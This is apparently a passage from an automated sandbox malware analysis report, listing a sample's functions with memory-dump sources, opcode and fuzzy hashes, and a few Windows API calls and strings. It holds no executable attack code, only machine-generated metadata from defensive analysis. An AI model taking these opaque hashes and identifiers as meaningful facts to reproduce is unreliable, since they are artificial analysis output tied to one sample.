                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                • String ID: WaitForMultipleObjects error %d, GetLastError %d
                • API String ID: 1091760877-2248577382
                • Opcode ID: 34d2ca31dc5edfbafdd9d6160ffefe79e98843bbdfe060fe8a1befa2fd7a6652
                • Instruction ID: 095c0c1eed7399f157b9cdf3a867b6904efbb8cc515836bb466b1ce8f3b0810d
                • Opcode Fuzzy Hash: 34d2ca31dc5edfbafdd9d6160ffefe79e98843bbdfe060fe8a1befa2fd7a6652
                • Instruction Fuzzy Hash: ABD0123250892166DA1127689C0A9AF7905FB53730F604714F239D52F5EA25495146A6
                Function 0087DA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNEL32(00000000,?,0087D32F,?), ref: 0087DA53
                • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0087D32F,?), ref: 0087DA61
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: FindHandleModuleResource
                • String ID: RTL
                • API String ID: 3537982541-834975271
                • Opcode ID: 869889facea1aace7e41a3e485796e2a862609b3c5fe50e2e39da28eef42b1ab
                • Instruction ID: 2b34c24dd31429e072851d5462ef205df495d14f351e7c3c625ff1fb3e9ceb86
                • Opcode Fuzzy Hash: 869889facea1aace7e41a3e485796e2a862609b3c5fe50e2e39da28eef42b1ab
                • Instruction Fuzzy Hash: DAC0123128575076F73017306C0DB437D98BB13B11F09044CB145DA5D4D5E5C9408750

                Executed Functions

                Function 00007FFAAC46E7CE Relevance: 5.2, Strings: 4, Instructions: 201COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID: 4$:$Y$j
                • API String ID: 0-2791243150
                • Opcode ID: cf63d68b67d758d274d175110285580694a8515161a453ce0f07eb483e233d67
                • Instruction ID: d3f591168f35df81e35e8a221da9b71e78f43a2072bacb2e83131678e2270ddf
                • Opcode Fuzzy Hash: cf63d68b67d758d274d175110285580694a8515161a453ce0f07eb483e233d67
                • Instruction Fuzzy Hash: 149118B0D096298FEBA8DF18C8997A9B7B1EB45304F1081EAD14DA3295DE346EC5CF44
                Function 00007FFAAC46ACC8 Relevance: 1.5, Strings: 1, Instructions: 202COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID: 89
                • API String ID: 0-211841788
                • Opcode ID: e5cf45a942690465b187fa5d01a71875acd93931721981ddb8b0f86d745ce3a8
                • Instruction ID: 69a82b00b6ca6d64380ac6928424b1e8a6d25851bd4c820aaf2509602af90758
                • Opcode Fuzzy Hash: e5cf45a942690465b187fa5d01a71875acd93931721981ddb8b0f86d745ce3a8
                • Instruction Fuzzy Hash: A261FA70D0DA1D8FEB94EB98D8596FDB7B1EF5A304F50417AD00DE3295DE34A8448B88
                Function 00007FFAAC46D869 Relevance: .4, Instructions: 389COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0cda8a3a1f278334e3642ef34949d81610c5ec50bbca09bda3569713ebde1915
                • Instruction ID: 68b021576d309d630a90cd13414a74bd0a71344f45b1a3141d889b4e9828eb37
                • Opcode Fuzzy Hash: 0cda8a3a1f278334e3642ef34949d81610c5ec50bbca09bda3569713ebde1915
                • Instruction Fuzzy Hash: 26E14C70D19A59CFEB98DB68C459BB8B7A1FF59304F0481BAD00ED7296CA34A844CF85
                Function 00007FFAAC460525 Relevance: .4, Instructions: 380COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 49900d5495806bcbe814299733eb34bbb03206e09d3edf4131f7b46908415862
                • Instruction ID: b2d8fdc751a51b7bcd566e64c48110306845d46cd63f0e07bedbd45003ae1e1c
                • Opcode Fuzzy Hash: 49900d5495806bcbe814299733eb34bbb03206e09d3edf4131f7b46908415862
                • Instruction Fuzzy Hash: 49B15C47A8E6C18FF311677CA42A5F57F90DF92229B0881B7D18DCA19BDC04E88D47D9
                Function 00007FFAAC46AB78 Relevance: .3, Instructions: 349COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1f94f7985e9440378802bb1bd4ea2f5543ed92064d221ed180f8a56cf51be188
                • Instruction ID: 3bff0f4a49ed81791dd0352347183dd23aea0c13c688991d804e879b2fdef50f
                • Opcode Fuzzy Hash: 1f94f7985e9440378802bb1bd4ea2f5543ed92064d221ed180f8a56cf51be188
                • Instruction Fuzzy Hash: 56D12F70D1A659CFEB58DB68C458ABCBBB1FF1A305F108179D00EE3291CA39A845CF85
                Function 00007FFAAC4605A0 Relevance: .3, Instructions: 315COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6249968f57025d873af1a394eac9ddcd53ed34967d310964a47cc41f76834961
                • Instruction ID: f786b9c071f9a0a16d067e9870ed148293c1abf2632b77481740de1743e3e12c
                • Opcode Fuzzy Hash: 6249968f57025d873af1a394eac9ddcd53ed34967d310964a47cc41f76834961
                • Instruction Fuzzy Hash: 6F915B4698E6C18FF31163BCA81E5F5AF90DF92229B0C81B7D18DCA19BDC14D84D87DA
                Function 00007FFAAC461738 Relevance: .3, Instructions: 292COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 32bf2fde7006a20153be69237eb14fcc9c700baccd43d5872f69bf11b07d8c0c
                • Instruction ID: 5422cddc497bfd18bd0fb239d44378cd121397938612fbb452f37888b1ec415b
                • Opcode Fuzzy Hash: 32bf2fde7006a20153be69237eb14fcc9c700baccd43d5872f69bf11b07d8c0c
                • Instruction Fuzzy Hash: B891A331A1CA498FEB58DB1CC8556B9B7E2FF99314B14457AE44EC328ACE34EC0687C5
                Function 00007FFAAC46060D Relevance: .3, Instructions: 291COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 41602f99469769042f934efe0b8f9dc5ce58f51a7a08b2fe3e9592c7e39d97f5
                • Instruction ID: 9a410cc385674370986a9d95e0dda22ed3ae4a0ee11c904a32e929a29220ac7a
                • Opcode Fuzzy Hash: 41602f99469769042f934efe0b8f9dc5ce58f51a7a08b2fe3e9592c7e39d97f5
                • Instruction Fuzzy Hash: C4814C4698E7C18FF21163BCA41E5F5AF90DF92228B0881B7D18D8A19FDC14D84D87DA
                Function 00007FFAAC460638 Relevance: .3, Instructions: 288COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ddb082fdc0effa4907f00436c39706ac800980e410c9c3061a85e5abbba27e85
                • Instruction ID: 60071755b694b5c48a1307d32ef2a6aed54de2d2f8a86e80eec9cea43d264ab9
                • Opcode Fuzzy Hash: ddb082fdc0effa4907f00436c39706ac800980e410c9c3061a85e5abbba27e85
                • Instruction Fuzzy Hash: 2081394694E6C18FF311636CA41D5F5AF90EF92229B0881B7D04DCA19FDC14D84D87D9
                Function 00007FFAAC460640 Relevance: .3, Instructions: 266COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 99f81c548425836049aa88206ef86783d0c45d66d0d4af1822fa4f2d97569cf3
                • Instruction ID: 9abdf59c296853c0ea7062fe78a2ed017ad45cb9f1bd905600ad2b39bddc17fd
                • Opcode Fuzzy Hash: 99f81c548425836049aa88206ef86783d0c45d66d0d4af1822fa4f2d97569cf3
                • Instruction Fuzzy Hash: DF713B8698E7C18FF21153BCA41E5F5AF90EF52229B0881B7D18D8A19FDC14D84D87DA
                Function 00007FFAAC46C69D Relevance: .2, Instructions: 206COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 296213b904145389411b14a519a82879a1d64f754d1fda06e5d13edaf3a22697
                • Instruction ID: bfe13705c3d6d6f9268caaa769a5851c8f61926342ea01b480592b9d110092a6
                • Opcode Fuzzy Hash: 296213b904145389411b14a519a82879a1d64f754d1fda06e5d13edaf3a22697
                • Instruction Fuzzy Hash: 2C71EA70D0952D8FEB94EB98C859BEDB7B1EF59304F1081BAD00DE3295CF7999848B84
                Function 00007FFAAC461D6D Relevance: .2, Instructions: 190COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b28effb189e4e0d458b9c003e876b8eb44ca932ead3fb4a2d953df6fcec1a346
                • Instruction ID: 5f733ae70c15372f3597116e96187a6e249276ede3c27f0796b1777ee3c5317b
                • Opcode Fuzzy Hash: b28effb189e4e0d458b9c003e876b8eb44ca932ead3fb4a2d953df6fcec1a346
                • Instruction Fuzzy Hash: D051C331A18B498FEB48DF18C8586BAB7E2FF99305B14857ED44EC7285CE34E8068785
                Function 00007FFAAC46C7D3 Relevance: .2, Instructions: 167COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9a0f87eb0cd68bed415bf4dbcb2cbeeee9ff11ad3a4358b0bedbc732a489626a
                • Instruction ID: e2d81c10897f87c0f194d4fce7c3060f8c2ae35d931581303622176a131d1be7
                • Opcode Fuzzy Hash: 9a0f87eb0cd68bed415bf4dbcb2cbeeee9ff11ad3a4358b0bedbc732a489626a
                • Instruction Fuzzy Hash: D341D63198D61A8BF755BBB8E4195FDB7E0EF06329F00857BD00DC5296DE34A0988794
                Function 00007FFAAC463265 Relevance: .1, Instructions: 146COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fcebf78c2cd682a6a95b1e5d96135b8de5d4e150373a0b24f0975280509b244c
                • Instruction ID: dd9485ced2b1dbd74ed8c70da459946e82f8442d7a572aeb342da984ea734749
                • Opcode Fuzzy Hash: fcebf78c2cd682a6a95b1e5d96135b8de5d4e150373a0b24f0975280509b244c
                • Instruction Fuzzy Hash: 62512970D0968DCFEB54EB98C4486ECB7F0EF5A305F50817AD40DE7299DE78A9488B84
                Function 00007FFAAC462185 Relevance: .1, Instructions: 140COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e4f9f5e65ece25f9951d65e537dbc6fff34f027321f6d684dc80b75b7ad0d113
                • Instruction ID: 4a15cef9cae778ad57cb4bfafeffd9dbc38949a60c7bc4ce1199dda274195273
                • Opcode Fuzzy Hash: e4f9f5e65ece25f9951d65e537dbc6fff34f027321f6d684dc80b75b7ad0d113
                • Instruction Fuzzy Hash: F0417B31A0EA498FF365D738C8491B9FBE0EF87304B0485BBD44DC71A6DE28E8458385
                Function 00007FFAAC46363B Relevance: .1, Instructions: 136COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2c4f6883b08a6b079497a9420532e5e6e69c6e1fb8920903d31adcc5b278863a
                • Instruction ID: 57e56f32f98d53ef89237da919a952ceae1627878b1f43cae9dd916e75e263ff
                • Opcode Fuzzy Hash: 2c4f6883b08a6b079497a9420532e5e6e69c6e1fb8920903d31adcc5b278863a
                • Instruction Fuzzy Hash: D741C67190D98E8FFB94DB6CC859ABDBBE0FF1A314F048179D00ED7296CE24A8008744
                Function 00007FFAAC46AD9D Relevance: .1, Instructions: 130COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 41a9b5fb21a80cee7752cee941c40ecf0410a77dfe6fed6b3bcc961f2cde59ea
                • Instruction ID: 5a7f014b7fcf2e59277f6eeee848c04fc4337d5566f02fac95688ad18592b0aa
                • Opcode Fuzzy Hash: 41a9b5fb21a80cee7752cee941c40ecf0410a77dfe6fed6b3bcc961f2cde59ea
                • Instruction Fuzzy Hash: 93411B62A4EBD69FF3439BBC88590E9BFA1FF5321570881BBC088C7097DA149819D3D5
                Function 00007FFAAC46C81D Relevance: .1, Instructions: 105COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 157f9db83e01f3b4199eb0ed7dcac27e2e2143ca32e2be4f43866b643e4ee4b2
                • Instruction ID: df52230f2047d1842e8c10e92ae4e959f3246d59397c808d9395a1648ea12a1f
                • Opcode Fuzzy Hash: 157f9db83e01f3b4199eb0ed7dcac27e2e2143ca32e2be4f43866b643e4ee4b2
                • Instruction Fuzzy Hash: 1031D8729CD656CBF7557BA8E41D4FCB790AF0232AF048137D00DC529BCE24B08886D8
                Function 00007FFAAC460805 Relevance: .1, Instructions: 89COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3484ce6ceaccaaa53ebaa1ae27b0d132a388d199de07e35c9654e0832196f82b
                • Instruction ID: 5b23a6018d234cf6bee377a40ffc27710757a9c0b44da6f5db76811e052b2dae
                • Opcode Fuzzy Hash: 3484ce6ceaccaaa53ebaa1ae27b0d132a388d199de07e35c9654e0832196f82b
                • Instruction Fuzzy Hash: FD217992A4D6829BF341A7BCD85D2E9BFD0FF52218F088077D04DC8187ED04E449C2C8
                Function 00007FFAAC46AE3C Relevance: .1, Instructions: 87COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4185da6c38517ddab794bae3bfa55c181d6bfa18dac79e8a97fa3a962bdf11d1
                • Instruction ID: 14f036530020fe8704964a177897d78b5dc4c887a6433fc54d2d0b99bf4c3e6a
                • Opcode Fuzzy Hash: 4185da6c38517ddab794bae3bfa55c181d6bfa18dac79e8a97fa3a962bdf11d1
                • Instruction Fuzzy Hash: CE216F70D59A0A8FF751EB68C84C6B9B7E1EF5A308F008876D40DD70AAEF34E4489684
                Function 00007FFAAC46C300 Relevance: .1, Instructions: 82COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5b2ff58931085f68269fb98b77618aaa0c6b328ed871c98b05764770be37f5e3
                • Instruction ID: ff9df1d031d535ca5ad5d709c29d2e262452f3b30b5f916e373e0ec0d7a52595
                • Opcode Fuzzy Hash: 5b2ff58931085f68269fb98b77618aaa0c6b328ed871c98b05764770be37f5e3
                • Instruction Fuzzy Hash: 6521D37188F3C54FE7074B705C2A0E57FB4AF03214B0941EBE488CB4A3D92D559AC3A2
                Function 00007FFAAC463351 Relevance: .1, Instructions: 78COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3047c08bb8b4a3100275a6db7e63f7aa69734f048e66404a637f2a86889fbc34
                • Instruction ID: cb43f9dcf2de02652447ba49dc387fc57f69acdb073c3f0767b46e42557c78f2
                • Opcode Fuzzy Hash: 3047c08bb8b4a3100275a6db7e63f7aa69734f048e66404a637f2a86889fbc34
                • Instruction Fuzzy Hash: 7621F771D0954DCFEB54EB98C498AECBBF1EF59305F10412AD40EE7295DE38A984CB84
                Function 00007FFAAC46A471 Relevance: .1, Instructions: 73COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ab3dde62f3cbe59c8bd270bd512b139b3982dc1578c18a5e6687b2f27262e190
                • Instruction ID: 06389f61f58f6cd5310fa11a6403c6db111286a1c7948904d6cb08037547d6d9
                • Opcode Fuzzy Hash: ab3dde62f3cbe59c8bd270bd512b139b3982dc1578c18a5e6687b2f27262e190
                • Instruction Fuzzy Hash: 1C216F70909A4D8FDB88EF18C8999AD7BE0FF29305F0045AAE80ED3155DB34E444CB81
                Function 00007FFAAC463470 Relevance: .1, Instructions: 70COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 952454bc24542e346502ac1a2f56c082d4723757afb5e9c7a0e49df3dd297284
                • Instruction ID: 08e9d6672983ff77eb1a3638248f70066451f5c6d6db55a17cfc7b2a1d0134fd
                • Opcode Fuzzy Hash: 952454bc24542e346502ac1a2f56c082d4723757afb5e9c7a0e49df3dd297284
                • Instruction Fuzzy Hash: 4F21AE3084E7CA8FE743AB78885D5A9BFF4EF07314B0944EBD049CB0A7DA28A549C751
                Function 00007FFAAC460A01 Relevance: .1, Instructions: 69COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 20eea128a7192197204f047de827381fbc0f7173f046215f32c24a9e29b8d4db
                • Instruction ID: b954df55168447b81fca9d64ebcecbaed8a5cc0650148d736ef70d3d5004f6fc
                • Opcode Fuzzy Hash: 20eea128a7192197204f047de827381fbc0f7173f046215f32c24a9e29b8d4db
                • Instruction Fuzzy Hash: 3911937491964E8FF780EB68C44D5B9BBE0FF59344F408976D40DC6096DE34E9488784
                Function 00007FFAAC46122D Relevance: .1, Instructions: 63COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e7ecf229720fbf9500f0bbb8466a964b9758287d4354a51ff8f1f368ec6fba21
                • Instruction ID: 9e86c67ec1698ad97e41c2b89c6fed35b65d133c2e63553698c2247c20af664f
                • Opcode Fuzzy Hash: e7ecf229720fbf9500f0bbb8466a964b9758287d4354a51ff8f1f368ec6fba21
                • Instruction Fuzzy Hash: DE11E27090A64A8FFB589B68C45D6B9BBF0FF66315F0085BAD00ED60D6DE249448C780
                Function 00007FFAAC46382D Relevance: .1, Instructions: 62COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 12ea8703ce590c6d3fc84c8c999b68e34976e8bba493ed9b6a52ebeba647d0ef
                • Instruction ID: 5e7907506cbb0557c3b5b6cc1b3b247440ab6e506677fceae6886fe01eaba627
                • Opcode Fuzzy Hash: 12ea8703ce590c6d3fc84c8c999b68e34976e8bba493ed9b6a52ebeba647d0ef
                • Instruction Fuzzy Hash: FA11DDB194D60E8FF748DF68D8187EA7BE1EB95355F5040BEC00AD32D6CBB614058B80
                Function 00007FFAAC46C8A0 Relevance: .1, Instructions: 62COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c4e8e90fdc7d1d9fa8c9a30285a7f2da356c310f301cee742250907b4a80de9c
                • Instruction ID: d20a9032862287d3fcbc63ff732d783621cee1ec9b841ba577c5d8c2ab0eaa07
                • Opcode Fuzzy Hash: c4e8e90fdc7d1d9fa8c9a30285a7f2da356c310f301cee742250907b4a80de9c
                • Instruction Fuzzy Hash: B7118C7090964E8FFB98EB64C4596B9BBE0FF19305F00847AD40EC61A5DE30A554C784
                Function 00007FFAAC46BB85 Relevance: .1, Instructions: 57COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fc3276c68ade8907229acfe95b21b3d785d8fac32f898133ee9affcc49340f98
                • Instruction ID: 1784232c45ae7435181489967200e1209fdd93f4ea1b56ba821652671a06ad03
                • Opcode Fuzzy Hash: fc3276c68ade8907229acfe95b21b3d785d8fac32f898133ee9affcc49340f98
                • Instruction Fuzzy Hash: 2011A070809A4D8FEB45EB24C859AB9BFA0FF19305F0044BAD40EC659ADB34A544C740
                Function 00007FFAAC46D458 Relevance: .1, Instructions: 57COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 76e2a9be0d3f3478801391f65db065c314281772b8130378d85765ef31759ffd
                • Instruction ID: c2166516f35a79a99ecee451fe4612cb41f824c2c006865a127ff5ef251a7494
                • Opcode Fuzzy Hash: 76e2a9be0d3f3478801391f65db065c314281772b8130378d85765ef31759ffd
                • Instruction Fuzzy Hash: D711E53180E7CA8FEB429B3488582F97FB0FF07208F0445FBE809CA092D7289959C781
                Function 00007FFAAC463595 Relevance: .1, Instructions: 56COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3e513fac1e2feb3fa89b2e8fff9fd0672bcc0285974e7551effa9bcf780c9cd3
                • Instruction ID: 5883dd717b04fc1386266e1f989707c3314faa265b6a9f34ce237969750f89de
                • Opcode Fuzzy Hash: 3e513fac1e2feb3fa89b2e8fff9fd0672bcc0285974e7551effa9bcf780c9cd3
                • Instruction Fuzzy Hash: E3117C7090968A8FEB48EF28C4596BABBE0FF19319F0049BAD41EC7195DE35A1448B44
